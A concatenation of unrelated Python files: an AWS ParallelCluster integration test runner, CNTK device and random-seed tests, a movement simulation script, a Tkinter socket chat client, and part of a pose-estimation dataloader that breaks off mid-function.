post_processing(outputs_path_fp16_gpu, outputs_path_fp32_gpu)
|
test_runner.py
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
import datetime
import logging
import multiprocessing
import os
import sys
import time
from tempfile import TemporaryDirectory
import argparse
import pytest
from reports_generator import generate_cw_report, generate_json_report, generate_junitxml_merged_report
logger = logging.getLogger()
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(module)s - %(message)s", level=logging.INFO)
START_TIME = time.time()
START_TIME_ISO = datetime.datetime.fromtimestamp(START_TIME).isoformat()
LOGS_DIR = "{0}.logs".format(START_TIME)
OUT_DIR = "{0}.out".format(START_TIME)
TEST_DEFAULTS = {
"parallelism": None,
"retry_on_failures": False,
"features": "", # empty string means all
"regions": [
"us-east-1",
"us-east-2",
"us-west-1",
"us-west-2",
"ca-central-1",
"eu-west-1",
"eu-west-2",
"eu-central-1",
"ap-southeast-1",
"ap-southeast-2",
"ap-northeast-1",
"ap-south-1",
"sa-east-1",
"eu-west-3",
],
"oss": ["alinux", "centos6", "centos7", "ubuntu1404", "ubuntu1604"],
"schedulers": ["sge", "slurm", "torque", "awsbatch"],
"instances": ["c4.xlarge", "c5.xlarge"],
"dry_run": False,
"reports": [],
"cw_region": "us-east-1",
"cw_namespace": "ParallelCluster/IntegrationTests",
"sequential": False,
"output_dir": "tests_outputs",
"custom_node_url": None,
"custom_cookbook_url": None,
"custom_template_url": None,
"custom_awsbatch_template_url": None,
"custom_awsbatchcli_url": None,
"custom_ami": None,
"vpc_stack": None,
"cluster": None,
"no_delete": False,
"benchmarks": False,
"benchmarks_target_capacity": 200,
"benchmarks_max_time": 30,
}
def _init_argparser():
parser = argparse.ArgumentParser(
description="Run integration tests suite.", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"-f",
"--features",
help="Run only tests for the listed features. Prepending the not keyword to the feature name causes the "
"feature to be excluded.",
default=TEST_DEFAULTS.get("features"),
nargs="+",
)
parser.add_argument(
"-r", "--regions", help="AWS region where tests are executed.", default=TEST_DEFAULTS.get("regions"), nargs="+"
)
parser.add_argument(
"--credential",
action="append",
help="STS credential endpoint, in the format <region>,<endpoint>,<ARN>,<externalId>. "
"Could be specified multiple times.",
required=False,
)
parser.add_argument(
"-i", "--instances", help="AWS instances under test.", default=TEST_DEFAULTS.get("instances"), nargs="+"
)
parser.add_argument("-o", "--oss", help="OSs under test.", default=TEST_DEFAULTS.get("oss"), nargs="+")
parser.add_argument(
"-s", "--schedulers", help="Schedulers under test.", default=TEST_DEFAULTS.get("schedulers"), nargs="+"
)
parser.add_argument(
"-n", "--parallelism", help="Tests parallelism for every region.", default=TEST_DEFAULTS.get("parallelism")
)
parser.add_argument(
"--retry-on-failures",
help="Retry once more the failed tests after a delay of 60 seconds.",
action="store_true",
default=TEST_DEFAULTS.get("retry_on_failures"),
)
parser.add_argument(
"--dry-run",
help="Only show the list of tests that would run with specified options.",
action="store_true",
default=TEST_DEFAULTS.get("dry_run"),
)
parser.add_argument(
"--show-output",
help="Do not redirect tests stdout to file. Not recommended when running in multiple regions.",
action="store_true",
default=TEST_DEFAULTS.get("show_output"),
)
parser.add_argument(
"--sequential",
help="Run tests in a single process. When not specified tests will run concurrently in all regions.",
action="store_true",
default=TEST_DEFAULTS.get("sequential"),
)
parser.add_argument(
"--reports",
help="create tests report files. junitxml creates a junit-xml style report file. html creates an html "
"style report file. json creates a summary with details for each dimensions. cw publishes tests metrics into "
"CloudWatch",
nargs="+",
choices=["html", "junitxml", "json", "cw"],
default=TEST_DEFAULTS.get("reports"),
)
parser.add_argument(
"--cw-region", help="Region where to publish CloudWatch metrics", default=TEST_DEFAULTS.get("cw_region")
)
parser.add_argument(
"--cw-namespace",
help="CloudWatch namespace where to publish metrics",
default=TEST_DEFAULTS.get("cw_namespace"),
)
parser.add_argument("--key-name", help="Key to use for EC2 instances", required=True)
parser.add_argument("--key-path", help="Path to the key to use for SSH connections", required=True, type=_is_file)
parser.add_argument(
"--output-dir", help="Directory where tests outputs are generated", default=TEST_DEFAULTS.get("output_dir")
)
parser.add_argument(
"--custom-node-url", help="URL to a custom node package.", default=TEST_DEFAULTS.get("custom_node_url")
)
parser.add_argument(
"--custom-cookbook-url",
help="URL to a custom cookbook package.",
default=TEST_DEFAULTS.get("custom_cookbook_url"),
)
parser.add_argument(
"--custom-template-url", help="URL to a custom cfn template.", default=TEST_DEFAULTS.get("custom_template_url")
)
parser.add_argument(
"--custom-awsbatch-template-url",
help="URL to a custom awsbatch cfn template.",
default=TEST_DEFAULTS.get("custom_awsbatch_template_url"),
)
parser.add_argument(
"--custom-awsbatchcli-url",
help="URL to a custom awsbatch cli package.",
default=TEST_DEFAULTS.get("custom_awsbatchcli_url"),
)
parser.add_argument(
"--custom-ami", help="custom AMI to use for all tests.", default=TEST_DEFAULTS.get("custom_ami")
)
parser.add_argument("--vpc-stack", help="Name of an existing vpc stack.", default=TEST_DEFAULTS.get("vpc_stack"))
parser.add_argument(
"--cluster", help="Use an existing cluster instead of creating one.", default=TEST_DEFAULTS.get("cluster")
)
parser.add_argument(
"--no-delete",
action="store_true",
help="Don't delete stacks after tests are complete.",
default=TEST_DEFAULTS.get("no_delete"),
)
parser.add_argument(
"--benchmarks",
help="run benchmarks tests. This disables the execution of all tests defined under the tests directory.",
action="store_true",
default=TEST_DEFAULTS.get("benchmarks"),
)
parser.add_argument(
"--benchmarks-target-capacity",
help="set the target capacity for benchmarks tests",
default=TEST_DEFAULTS.get("benchmarks_target_capacity"),
type=int,
)
parser.add_argument(
"--benchmarks-max-time",
help="set the max waiting time in minutes for benchmarks tests",
default=TEST_DEFAULTS.get("benchmarks_max_time"),
type=int,
)
return parser
def _is_file(value):
if not os.path.isfile(value):
raise argparse.ArgumentTypeError("'{0}' is not a valid key".format(value))
return value
def _get_pytest_args(args, regions, log_file, out_dir):
pytest_args = ["-s", "-vv", "-l"]
if args.benchmarks:
pytest_args.append("--ignore=./tests")
pytest_args.append("--rootdir=./benchmarks")
pytest_args.append("--benchmarks-target-capacity={0}".format(args.benchmarks_target_capacity))
pytest_args.append("--benchmarks-max-time={0}".format(args.benchmarks_max_time))
else:
pytest_args.append("--rootdir=./tests")
pytest_args.append("--ignore=./benchmarks")
# Show all tests durations
pytest_args.append("--durations=0")
# Run only tests with the given markers
pytest_args.append("-m")
pytest_args.append(" or ".join(args.features))
pytest_args.append("--regions")
pytest_args.extend(regions)
pytest_args.append("--instances")
pytest_args.extend(args.instances)
pytest_args.append("--oss")
pytest_args.extend(args.oss)
pytest_args.append("--schedulers")
pytest_args.extend(args.schedulers)
pytest_args.extend(["--tests-log-file", "{0}/{1}".format(args.output_dir, log_file)])
pytest_args.extend(["--output-dir", "{0}/{1}".format(args.output_dir, out_dir)])
pytest_args.extend(["--key-name", args.key_name])
pytest_args.extend(["--key-path", args.key_path])
if args.credential:
pytest_args.append("--credential")
pytest_args.extend(args.credential)
if args.retry_on_failures:
# Rerun tests on failures for one more time after 60 seconds delay
pytest_args.extend(["--reruns", "1", "--reruns-delay", "60"])
if args.parallelism:
pytest_args.extend(["-n", args.parallelism])
if args.dry_run:
pytest_args.append("--collect-only")
if any(report in ["junitxml", "json", "cw"] for report in args.reports):
pytest_args.append("--junit-xml={0}/{1}/results.xml".format(args.output_dir, out_dir))
if "html" in args.reports:
pytest_args.append("--html={0}/{1}/results.html".format(args.output_dir, out_dir))
_set_custom_packages_args(args, pytest_args)
_set_custom_stack_args(args, pytest_args)
return pytest_args
def _set_custom_packages_args(args, pytest_args):
if args.custom_node_url:
pytest_args.extend(["--custom-node-package", args.custom_node_url])
if args.custom_cookbook_url:
pytest_args.extend(["--custom-chef-cookbook", args.custom_cookbook_url])
if args.custom_template_url:
pytest_args.extend(["--template-url", args.custom_template_url])
if args.custom_awsbatch_template_url:
pytest_args.extend(["--custom-awsbatch-template-url", args.custom_awsbatch_template_url])
if args.custom_awsbatchcli_url:
pytest_args.extend(["--custom-awsbatchcli-package", args.custom_awsbatchcli_url])
if args.custom_ami:
pytest_args.extend(["--custom-ami", args.custom_ami])
def _set_custom_stack_args(args, pytest_args):
if args.vpc_stack:
pytest_args.extend(["--vpc-stack", args.vpc_stack])
if args.cluster:
pytest_args.extend(["--cluster", args.cluster])
if args.no_delete:
pytest_args.append("--no-delete")
def _get_pytest_regionalized_args(region, args):
return _get_pytest_args(
args=args,
regions=[region],
log_file="{0}/{1}.log".format(LOGS_DIR, region),
out_dir="{0}/{1}".format(OUT_DIR, region),
)
def _get_pytest_non_regionalized_args(args):
return _get_pytest_args(
args=args, regions=args.regions, log_file="{0}/all_regions.log".format(LOGS_DIR), out_dir=OUT_DIR
)
def _run_test_in_region(region, args):
out_dir = "{base_dir}/{out_dir}/{region}".format(base_dir=args.output_dir, out_dir=OUT_DIR, region=region)
os.makedirs(out_dir, exist_ok=True)
# Redirect stdout to file
if not args.show_output:
sys.stdout = open("{0}/pytest.out".format(out_dir), "w")
pytest_args_regionalized = _get_pytest_regionalized_args(region, args)
with TemporaryDirectory() as temp_dir:
pytest_args_regionalized.extend(["--basetemp", temp_dir])
logger.info("Starting tests in region {0} with params {1}".format(region, pytest_args_regionalized))
pytest.main(pytest_args_regionalized)
def _make_logging_dirs(base_dir):
logs_dir = "{base_dir}/{logs_dir}".format(base_dir=base_dir, logs_dir=LOGS_DIR)
os.makedirs(logs_dir, exist_ok=True)
logger.info("Configured logs dir: {0}".format(logs_dir))
out_dir = "{base_dir}/{out_dir}".format(base_dir=base_dir, out_dir=OUT_DIR)
os.makedirs(out_dir, exist_ok=True)
logger.info("Configured tests output dir: {0}".format(out_dir))
def _run_parallel(args):
jobs = []
for region in args.regions:
p = multiprocessing.Process(target=_run_test_in_region, args=[region, args])
jobs.append(p)
p.start()
for job in jobs:
job.join()
def _run_sequential(args):
# Redirect stdout to file
if not args.show_output:
sys.stdout = open("{0}/{1}/pytest.out".format(args.output_dir, OUT_DIR), "w")
pytest_args_non_regionalized = _get_pytest_non_regionalized_args(args)
logger.info("Starting tests with params {0}".format(pytest_args_non_regionalized))
pytest.main(pytest_args_non_regionalized)
def main():
"""Entrypoint for tests executor."""
args = _init_argparser().parse_args()
logger.info("Starting tests with parameters {0}".format(args))
_make_logging_dirs(args.output_dir)
if args.sequential:
_run_sequential(args)
else:
_run_parallel(args)
logger.info("All tests completed!")
reports_output_dir = "{base_dir}/{out_dir}".format(base_dir=args.output_dir, out_dir=OUT_DIR)
if "junitxml" in args.reports:
generate_junitxml_merged_report(reports_output_dir)
if "json" in args.reports:
logger.info("Generating tests report")
generate_json_report(reports_output_dir)
if "cw" in args.reports:
logger.info("Publishing CloudWatch metrics")
generate_cw_report(reports_output_dir, args.cw_namespace, args.cw_region)
if __name__ == "__main__":
main()
|
misc_test.py
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
import numpy as np
import pytest
import cntk
from cntk.device import *
import sys
from multiprocessing import Process, Queue
cntk_py.always_allow_setting_default_device()
def is_locked_cross_process(queue, device_id):
device = cpu() if device_id < 0 else gpu(device_id)
queue.put(device.is_locked())
def is_locked(device):
q = Queue()
    device_id = -1 if (device.type() == DeviceKind.CPU) else device.id()
    p = Process(target=is_locked_cross_process, args=(q, device_id))
p.start()
p.join()
assert p.exitcode == 0
return q.get()
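# Rationale (assumed, not stated here): querying the lock status from a child
# process keeps the check independent of any device state already held by the
# test process itself.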
def test_callstack1():
with pytest.raises(ValueError) as excinfo:
cntk.device.gpu(99999)
assert '[CALL STACK]' in str(excinfo.value)
def test_callstack2():
with pytest.raises(ValueError) as excinfo:
cntk.io.MinibatchSource(cntk.io.CTFDeserializer("", streams={}))
assert '[CALL STACK]' in str(excinfo.value)
def test_cpu_and_gpu_devices():
device = cpu()
assert device.type() == DeviceKind.CPU
assert device.id() == 0
for i in range(len(all_devices()) - 1):
device = gpu(i)
assert device.type() == DeviceKind.GPU
assert device.id() == i
def test_all_devices():
assert len(all_devices()) > 0
assert cpu() in all_devices()
if (len(all_devices()) > 1):
assert gpu(0) in all_devices()
def test_gpu_properties():
for device in all_devices():
if (device.type() != DeviceKind.GPU):
continue
props = get_gpu_properties(device)
assert props.device_id == device.id()
assert props.cuda_cores > 0
assert props.total_memory > 0
assert props.version_major > 0
def _use_default_device(queue):
# use_default_device needs to be tested in isolation
# in a freshly created process environment.
device = use_default_device()
if (device.type() != DeviceKind.GPU):
queue.put(not is_locked(device))
else:
queue.put(is_locked(device))
def test_use_default_device():
# this will release any previous held device locks
try_set_default_device(cpu(), False)
q = Queue()
p = Process(target=_use_default_device, args=(q,))
p.start()
p.join()
assert p.exitcode == 0
assert q.get()
def test_set_cpu_as_default_device():
device = cpu()
assert not is_locked(device)
assert not try_set_default_device(device, True)
assert not is_locked(device)
assert try_set_default_device(device)
assert try_set_default_device(device, False)
assert not is_locked(device)
assert device == use_default_device()
def test_set_gpu_as_default_device():
if len(all_devices()) == 1:
        return
# this will release any previous held device locks
try_set_default_device(cpu(), False)
for i in range(len(all_devices()) - 1):
device = gpu(i)
assert try_set_default_device(device, False)
assert not is_locked(device)
assert device == use_default_device()
if not device.is_locked():
assert not is_locked(device)
assert try_set_default_device(device, True)
assert device == use_default_device()
assert is_locked(device)
def test_set_excluded_devices():
if len(all_devices()) == 1:
        return
assert try_set_default_device(cpu(), False)
assert try_set_default_device(gpu(0), False)
set_excluded_devices([cpu()])
assert not try_set_default_device(cpu(), False)
set_excluded_devices([])
assert try_set_default_device(cpu(), False)
def test_setting_trace_level():
from cntk.logging import TraceLevel, set_trace_level, get_trace_level
value = get_trace_level()
assert value == TraceLevel.Warning
for level in [TraceLevel.Info, TraceLevel.Error, TraceLevel.Warning]:
set_trace_level(level)
value = get_trace_level()
assert value == level
set_trace_level(level.value)
value = get_trace_level()
assert value == level
def get_random_parameter_value(initializer, seed=None):
    init = initializer(scale=cntk.initializer.DefaultParamInitScale, seed=seed)
return cntk.ops.parameter(shape=(10,), init=init).value
def get_dropout_rng_seed(seed=None):
if (seed):
f = cntk.ops.dropout(0.5, seed=seed)
else:
f = cntk.ops.dropout(0.5)
return f.root_function.attributes['rngSeed']
def test_rng_seeding_in_parameter_initialization():
initializers = [
cntk.initializer.glorot_normal,
cntk.initializer.glorot_uniform,
cntk.initializer.he_normal,
cntk.initializer.he_uniform,
cntk.initializer.normal,
cntk.initializer.uniform,
cntk.initializer.xavier
]
for x in initializers:
cntk.cntk_py.reset_random_seed(1)
p1 = get_random_parameter_value(x)
p2 = get_random_parameter_value(x)
assert not np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(2)
p1 = get_random_parameter_value(x)
cntk.cntk_py.reset_random_seed(2)
p2 = get_random_parameter_value(x)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(3)
p1 = get_random_parameter_value(x, seed=123)
p2 = get_random_parameter_value(x, seed=123)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(4)
p1 = get_random_parameter_value(x, seed=123)
p2 = get_random_parameter_value(x, seed=456)
assert not np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(5)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x)
p2 = get_random_parameter_value(x)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(6)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x, seed=123)
p2 = get_random_parameter_value(x, seed=123)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(7)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x, seed=123)
p2 = get_random_parameter_value(x, seed=456)
assert not np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(8)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x)
cntk.cntk_py.set_fixed_random_seed(987)
p2 = get_random_parameter_value(x)
assert not np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(9)
cntk.cntk_py.set_fixed_random_seed(789)
p1 = get_random_parameter_value(x)
cntk.cntk_py.set_fixed_random_seed(987)
cntk.cntk_py.set_fixed_random_seed(789)
p2 = get_random_parameter_value(x)
assert np.allclose(p1, p2)
cntk.cntk_py.reset_random_seed(0)
def test_rng_seeding_in_dropout():
seed1 = get_dropout_rng_seed()
seed2 = get_dropout_rng_seed()
assert seed1 != seed2
seed1 = get_dropout_rng_seed(seed=123)
seed2 = get_dropout_rng_seed(seed=123)
assert seed1 == seed2 and seed1 == 123
cntk.cntk_py.set_fixed_random_seed(456)
seed1 = get_dropout_rng_seed()
seed2 = get_dropout_rng_seed()
assert seed1 == seed2 and seed1 == 456
cntk.cntk_py.reset_random_seed(789)
seed1 = get_dropout_rng_seed()
cntk.cntk_py.reset_random_seed(789)
seed2 = get_dropout_rng_seed()
assert seed1 == seed2 and seed1 == 789
cntk.cntk_py.reset_random_seed(0)
|
entitytest.py
|
#!/usr/bin/env python3
from psydewalk.entity import *
from psydewalk.geo import Coordinate
from datetime import datetime
from threading import Thread
from time import sleep
def wörkwörk(entity, dest):
start = datetime.now()
print('Start: ' + str(start))
entity.moveTo(dest)
end = datetime.now()
print('End: ' + str(end))
print('Duration: ' + str(end - start))
home = Coordinate(54.355420, 10.135980)
finance = Coordinate(54.355695, 10.131490)
speed = 25 / 3.6
dist = home.dist(finance)
print('distance: {0} m, speed: {1} m/s, duration: {2} s'.format(dist, speed, dist / speed))
entity = SmoothMovingEntity(home, speed)
Thread(target=wörkwörk, args=(entity,finance)).start()
sleep(2)
print('SPEED=2')
entity.setSpeed(2)
sleep(5)
print('SPEED=25')
entity.setSpeed(25)
|
client.py
|
"""Script for Tkinter GUI chat client."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter
def receive():
"""Handles receiving of messages."""
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
msg = my_msg.get()
my_msg.set("") # Clears input field.
client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
client_socket.close()
top.quit()
def on_closing(event=None):
"""This function is to be called when the window is closed."""
my_msg.set("{quit}")
send()
top = tkinter.Tk()
top.title("Chatter")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#----Now comes the sockets part----
HOST = input('Enter host: ')
PORT = input('Enter port: ')
if not PORT:
PORT = 33000
else:
PORT = int(PORT)
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop() # Starts GUI execution.
|
dataloader.py
|
import os
import torch
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.transforms as transforms
from PIL import Image, ImageDraw
from SPPE.src.utils.img import load_image, cropBox, im_to_torch
from opt import opt
from yolo.preprocess import prep_image, prep_frame, inp_to_image
from pPose_nms import pose_nms, write_json
from matching import candidate_reselect as matching
from SPPE.src.utils.eval import getPrediction, getMultiPeakPrediction
from yolo.util import write_results, dynamic_write_results
from yolo.darknet import Darknet
from tqdm import tqdm
import cv2
import json
import numpy as np
import sys
import time
import torch.multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Queue as pQueue
from threading import Thread
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue, LifoQueue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue, LifoQueue
if opt.vis_fast:
from fn import vis_frame_fast as vis_frame
else:
from fn import vis_frame
class Image_loader(data.Dataset):
def __init__(self, im_names, format='yolo'):
super(Image_loader, self).__init__()
self.img_dir = opt.inputpath
self.imglist = im_names
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
self.format = format
def getitem_ssd(self, index):
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im = Image.open(im_name)
inp = load_image(im_name)
if im.mode == 'L':
im = im.convert('RGB')
ow = oh = 512
im = im.resize((ow, oh))
im = self.transform(im)
return im, inp, im_name
def getitem_yolo(self, index):
inp_dim = int(opt.inp_dim)
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im, orig_img, im_dim = prep_image(im_name, inp_dim)
#im_dim = torch.FloatTensor([im_dim]).repeat(1, 2)
inp = load_image(im_name)
return im, inp, orig_img, im_name, im_dim
def __getitem__(self, index):
if self.format == 'ssd':
return self.getitem_ssd(index)
elif self.format == 'yolo':
return self.getitem_yolo(index)
else:
raise NotImplementedError
def __len__(self):
return len(self.imglist)
class ImageLoader:
def __init__(self, im_names, batchSize=1, format='yolo', queueSize=50):
self.img_dir = opt.inputpath
self.imglist = im_names
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
self.format = format
self.batchSize = batchSize
self.datalen = len(self.imglist)
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store data
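        # opt.sp presumably selects single-process mode: use a thread-safe queue.Queue;
        # otherwise a multiprocessing.Queue is shared with the worker process started in start().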
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if self.format == 'ssd':
if opt.sp:
p = Thread(target=self.getitem_ssd, args=())
else:
p = mp.Process(target=self.getitem_ssd, args=())
elif self.format == 'yolo':
if opt.sp:
p = Thread(target=self.getitem_yolo, args=())
else:
p = mp.Process(target=self.getitem_yolo, args=())
elif self.format == 'mtcnn':
if opt.sp:
p = Thread(target=self.getitem_mtcnn, args=())
else:
p = mp.Process(target=self.getitem_mtcnn, args=())
else:
raise NotImplementedError
p.daemon = True
p.start()
return self
def getitem_ssd(self):
length = len(self.imglist)
for index in range(length):
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im = Image.open(im_name)
inp = load_image(im_name)
if im.mode == 'L':
im = im.convert('RGB')
ow = oh = 512
im = im.resize((ow, oh))
im = self.transform(im)
while self.Q.full():
time.sleep(2)
self.Q.put((im, inp, im_name))
def getitem_yolo(self):
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
im_name_k = self.imglist[k].rstrip('\n').rstrip('\r')
im_name_k = os.path.join(self.img_dir, im_name_k)
img_k, orig_img_k, im_dim_list_k = prep_image(im_name_k, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(im_name_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def getitem_mtcnn(self):
"""Same as getitem_yolo()"""
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
im_name_k = self.imglist[k].rstrip('\n').rstrip('\r')
im_name_k = os.path.join(self.img_dir, im_name_k)
try:
img_k, orig_img_k, im_dim_list_k = prep_image(im_name_k, inp_dim)
except BaseException as e:
print(im_name_k, e)
continue
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(im_name_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def getitem(self):
return self.Q.get()
def length(self):
return len(self.imglist)
def len(self):
return self.Q.qsize()
class VideoLoader:
def __init__(self, path, batchSize=1, queueSize=50):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.path = path
self.stream = cv2.VideoCapture(path)
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
self.batchSize = batchSize
self.datalen = int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def length(self):
return self.datalen
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
stream = cv2.VideoCapture(self.path)
assert stream.isOpened(), 'Cannot capture source'
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
(grabbed, frame) = stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.Q.put((None, None, None, None))
print('===========================> This video get '+str(k)+' frames in total.')
sys.stdout.flush()
return
# process and add the frame to the queue
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(str(k)+'.jpg')
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def getitem(self):
# return next frame in the queue
return self.Q.get()
def len(self):
return self.Q.qsize()
class DetectionLoader:
def __init__(self, dataloder, batchSize=1, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
# self.det_inp_dim = int(self.det_model.net_info['height'])
self.det_inp_dim = int(opt.inp_dim)
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stopped = False
self.dataloder = dataloder
self.batchSize = batchSize
self.datalen = self.dataloder.length()
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
# keep looping the whole dataset
from mtcnn.mtcnn import MTCNN
detector = MTCNN()
for i in range(self.num_batches):
img, orig_img, im_name, im_dim_list = self.dataloder.getitem()
if img is None:
self.Q.put((None, None, None, None, None, None, None))
return
with torch.no_grad():
if self.dataloder.format == 'yolo':
# Human Detection
img = img.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
elif self.dataloder.format == 'mtcnn':
# Face detection
imgs_np = img.float().mul(255.0).cpu().numpy()
imgs_np = np.squeeze(imgs_np, axis=0)
imgs_np = np.transpose(imgs_np, (1, 2, 0))
dets = detector.detect_faces(imgs_np)
fac_det = []
for det in dets:
fac_det.append([0, det["box"][0], det["box"][1],
det["box"][0] + det["box"][2], det["box"][1] + det["box"][3],
det["confidence"], 0.99, 0])
dets = torch.tensor(fac_det)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(orig_img)):
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
dets = dets.cpu()
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
